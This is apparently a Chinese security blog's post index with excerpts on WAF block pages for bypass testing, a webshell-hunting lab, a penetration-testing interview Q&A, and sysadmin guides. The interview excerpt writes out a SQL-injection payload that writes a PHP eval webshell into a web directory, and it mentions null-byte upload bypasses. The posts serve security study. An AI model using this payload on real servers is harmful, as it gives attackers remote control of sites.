常见WAF拦截页整理
常见WAF拦截页整理2019年底在@madcoding老哥博客中看到“waf的识别与绕过”一文中搜集了不少WAF拦截页面,正好我平时也有搜集WAF拦截页面习惯,所以就结合他的一起整理了这篇文章,也便于自己在日后遇到WAF时好查询,然后再对其进行针对性的绕过测试!!! 如今WAF种类繁多,我们搜集整理的可能也不是那么齐全和准确,还望得到各位师傅的补充和修正!!! (1) D盾 (2) 云锁 (3) UPUPW (4) BT-宝塔 (5) 网防G01 (6) 护卫神 (7) 网站安全狗 (8) 智创防火墙 (9) 360主机卫士/360webscan (10) 西数WTS-WAF (11) Naxsi WAF (12) 腾讯云 (13) 腾讯宙斯盾 (14) 百度云 (15) 华为云 (16) 网宿云 (17) 创宇盾 (18) 玄武盾 (19) 阿里云盾 (20) 360网站卫士 (21) 奇安信网站卫士 (22) 安域云WAF (23) 铱讯WAF (24) 长亭SafeLine 新版雷池waf(社区版) (25) 安恒明御WAF (26) F5...
斗象科技2024HW高危漏洞合集
斗象科技2024HW高危漏洞合集v1.0下载地址 v2.0下载地址 v3.0下载地址 v1.0预览 v2.0预览 v3.0预览
玄机靶场--1.webshell查杀
玄机靶场–1.webshell查杀我们先启动环境 开启环境后会有IP地址 账号密码就在概述里面 使用SSH链接靶机,然后查看开启的端口 端口显示有80,22,3306,有web服务 然后查找目录,进入根目录用 1find -name index.html 查找到在/var/www/html目录下 现在本地靶机进行河马webshell扫描 然后发现扫描不到,只有一个一句话木马,无法进行外网访问,我们另起他法,将目录打包到本地 然后在在线扫描再试试看(其实我本地杀软已经报毒了,但是还是在河马在线扫描进行了一次扫描)地址链接 一共扫描出5个结果 1、黑客webshell里面的flag一个疑似PHP命令执行webshell,一个是PHP命令执行webshell 我们先打开这个比较确定的 里面有一串注释就是webshell里面的flag了 2、黑客使用的什么工具的shell...
亚信安全2024攻防演练高危漏洞合集
亚信安全2024攻防演练高危漏洞合集下载地址 预览
记一次国护面试题
记一次国护面试题先看简历,然后根据你的项目经验去先问一些针对性问题,这些就自由回答了。 问:绕过白名单的方式 答: 100截断 问:00截断应该写在哪里 答: 1放在文件上传的路径后面 问:你一般如何用sql写入webshell呢 答: 12345678910常见的仅适用于联合注入。union 跟 select into outfileunion select 1,"<?php @eval($_POST['xxxx']);?>",3 into outfile 'D:\\www\\WWWroot\\hack.php'或者写入到表,然后在导出为文件写入到日志里盲注或者报错常用分隔符注入into outfile 'D:\\www\\WWWroot\\hack.php' lines terminated by '<?php...
Scoop使用体验
Scoop使用体验Scoop的项目地址:https://github.com/ScoopInstaller/Scoop 前言Scoop 从命令行以最小的安装您熟悉和喜爱的程序: 消除权限弹出窗口 隐藏 GUI 向导式安装程序 防止安装大量程序造成 PATH 污染 避免因安装和卸载程序而产生的意外副作用 自动查找并安装依赖项 自行执行所有额外的设置步骤以获得工作程序 这是官网的机翻,以我自己来说,这是一个可以节省大量时间的包管理工具,不需要在配环境上面大费时间(配环境也是一个学习的过程,不建议新手一上来就使用此工具) 安装 Powershell>=5.1 Windows的用户名为英文 且可以对GitHub有快速、正常访问和下载资源的速度 先在Powershell执行 1Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser 然后有两种安装方式具体可以看文档,我们不进行详解只进行一个两种方式的测试安装 第一种 12irm get.scoop.sh |...
越南海莲花APT针对中国大陆的邮件钓鱼技战术手法总结
Part1...
用jigdo-file下载Debian-DLBD镜像
1、准备一台虚拟机 建议为Debian 2、配置网络源:(哪里快配置哪里不需要照抄) 123456789vim /etc/apt/sources.listdeb https://mirror.lzu.edu.cn/debian/ bullseye main contrib non-freedeb-src https://mirror.lzu.edu.cn/debian/ bullseye main contrib non-freedeb https://mirror.lzu.edu.cn/debian/ bullseye-updates main contrib non-freedeb-src https://mirror.lzu.edu.cn/debian/ bullseye-updates main contrib non-freedeb https://mirror.lzu.edu.cn/debian/ bullseye-backports main contrib non-freedeb-src https://mirror.lzu.edu.cn/debian/...
使用docker给群晖更新SSL证书
0、序言建议手动导入证书,一键申请证书 本次使用群晖自带的docker来部署acme.sh 这是大佬的仓库地址:acmesh-official/acme.sh: A pure Unix shell script implementing ACME client protocol (github.com) 1、准备首先acme支持DNS api 所以我们先去腾讯云,阿里云等等申请DNS api密钥 acme支持的厂商有很多详情请看说明文档:dnsapi · acmesh-official/acme.sh Wiki...
群晖定时备份数据库
平时在群晖搭建网站,数据库虽然可以手动导出但是太麻烦 今天我们利用群晖的定时任务来定时备份数据库 备份所有数据库123456789101112131415161718192021222324252627#!/bin/bash# 数据库凭证USER="用户名"PASSWORD="密码"HOST="localhost"PORT="3306"# 备份目录BACKUP_DIR="/volume1/backup"# 时间戳命名TIMESTAMP=$(date +"%Y-%m-%d_%H-%M-%S")# 获取所有数据库的列表DATABASES=$(mysql --user=$USER --password=$PASSWORD --host=$HOST --port=$PORT -e "SHOW DATABASES;" | tr -d "| " | grep -v Database)# 循环遍历每个数据库并备份for DB_NAME...